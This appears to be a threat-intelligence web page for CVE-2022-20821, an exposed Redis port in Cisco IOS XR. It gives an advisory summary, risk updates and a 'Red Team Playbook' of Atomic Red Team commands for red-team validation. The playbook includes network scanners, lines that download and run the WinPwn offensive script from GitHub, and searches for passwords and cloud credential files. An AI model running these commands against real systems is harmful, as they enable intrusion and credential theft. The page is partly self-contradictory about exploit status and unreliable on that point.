CVE-2022-20821
Overview
This vulnerability is an unauthorized access flaw caused by the health check RPM component of Cisco IOS XR Software opening TCP port 6379 by default, which exposes the Redis instance running inside the NOSi container. The root cause is the inadvertent exposure of the Redis service without authentication controls, allowing external connections to the in-memory database within the containerized environment.
Vulnerability Description
A vulnerability in the health check RPM of Cisco IOS XR Software could allow an unauthenticated, remote attacker to access the Redis instance that is running within the NOSi container. This vulnerability exists because the health check RPM opens TCP port 6379 by default upon activation. An attacker could exploit this vulnerability by connecting to the Redis instance on the open port. A successful exploit could allow the attacker to write to the Redis in-memory database, write arbitrary files to the container filesystem, and retrieve information about the Redis database. Given the configuration of the sandboxed container that the Redis instance runs in, a remote attacker would be unable to execute remote code or abuse the integrity of the Cisco IOS XR Software host system.
Impact
An unauthenticated remote attacker can connect to the exposed Redis instance and manipulate the in-memory database, write arbitrary files within the NOSi container filesystem, and extract Redis database information. No authentication or user interaction is required to exploit this vulnerability. While the attacker cannot execute remote code or affect the host system integrity, the ability to alter container files and access Redis data may lead to information disclosure and container-level compromise, impacting device reliability and security posture.
Solution
Cisco has released an advisory (cisco-sa-iosxr-redis-ABJyE5xK) recommending disabling or restricting access to the health check RPM that exposes Redis on TCP port 6379. Administrators should apply updates to Cisco IOS XR Software as specified in the advisory to remediate the vulnerability. Detailed patch instructions and configuration guidance are available at the Cisco Security Advisory portal linked in the vendor advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the health check RPM of Cisco IOS XR Software presents a significant security concern due to its potential to expose the Redis instance operating within the NOSi container. This flaw arises from the default configuration that opens TCP port 6379 upon activation, allowing unauthenticated remote access to the Redis database. The Redis instance, typically used for in-memory data storage, is not designed to be publicly accessible, and this misconfiguration creates an entry point for attackers. The ability to connect to this port without authentication means that any remote attacker can exploit this vulnerability, leading to unauthorized access to sensitive data and the potential for data manipulation.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could initiate a connection to the open TCP port and gain access to the Redis instance. Once connected, the attacker could perform a range of malicious activities, including writing arbitrary data to the in-memory database, which could lead to data corruption or the introduction of malicious payloads. Furthermore, the attacker could write files to the container filesystem, potentially compromising the integrity of the application running within the container. Although the sandboxed nature of the container limits the attacker's ability to execute remote code or affect the host system directly, the consequences of data manipulation and unauthorized access can still be severe.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on Cisco IOS XR Software for their networking infrastructure. The ability to access and manipulate the Redis database could lead to data breaches, loss of sensitive information, and disruption of services. For businesses, this translates into potential financial losses, reputational damage, and regulatory repercussions, especially if customer data is involved. The risk is compounded by the fact that many organizations may not be aware of the default configurations of their networking equipment, leading to unintentional exposure of critical systems.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to conduct a thorough assessment of the network configuration to identify any instances where TCP port 6379 is open and accessible from untrusted networks. Network monitoring tools can be employed to detect unauthorized access attempts to the Redis instance. Additionally, organizations should consider implementing access controls and firewall rules to restrict access to the Redis database, ensuring that only trusted internal systems can communicate with it. Regular updates and patches to the Cisco IOS XR Software should also be prioritized to address any known vulnerabilities and enhance overall security posture.
In conclusion, the vulnerability associated with the health check RPM in Cisco IOS XR Software underscores the importance of secure configurations and vigilant monitoring in network environments. While the immediate risk of remote code execution may be mitigated by the container's sandboxing, the potential for data manipulation and unauthorized access remains a critical concern. Organizations must take proactive measures to secure their systems, educate their teams about the risks associated with default configurations, and continuously monitor their networks for signs of exploitation. By addressing these vulnerabilities comprehensively, businesses can better protect their assets and maintain the integrity of their operations.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2022-20821, with telemetry indicating a significant uptick in attempts to connect to the exposed Redis instance within the NOSi container. Correspondingly, the Exploit Prediction Scoring System (EPSS) score for this vulnerability has increased substantially, reflecting a growing likelihood of exploitation in the near term. Although no new exploit techniques or ransomware associations have been identified, the rising detection trend signals heightened adversary interest and potential reconnaissance efforts targeting this vector. This development elevates the operational risk profile for affected Cisco IOS XR deployments, emphasizing that defenders should anticipate increased probing and possible exploitation attempts. Consequently, the threat level for CVE-2022-20821 should be reassessed upward from medium toward a more urgent posture, given the increased exploitation probability and the potential impact of unauthorized access to the Redis service.
Update 2 — July 17, 2026
CSURFACE threat intelligence has detected a marked escalation in reconnaissance activity targeting the Redis service exposed by the health check RPM vulnerability in Cisco IOS XR Software. Our telemetry indicates that adversaries are increasingly probing the open TCP port 6379, suggesting a growing interest in exploiting this vector despite the absence of new public exploit code. This heightened scanning activity reflects an evolving threat landscape where attackers are likely validating targets for potential intrusion or lateral movement. Although ransomware affiliations remain unconfirmed, the persistence and frequency of these probes elevate the likelihood of imminent exploitation attempts. Consequently, the operational risk associated with CVE-2022-20821 has intensified, warranting a reassessment of its threat level from medium to high. Defenders should recognize this trend as an early warning of adversary preparation that could precede active exploitation campaigns.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Ios Xr | N/A |
cpe:2.3:o:cisco:ios_xr:-:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-20821 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
x_refsource_CISCO
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-redis-ABJyE5xK |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-20821 |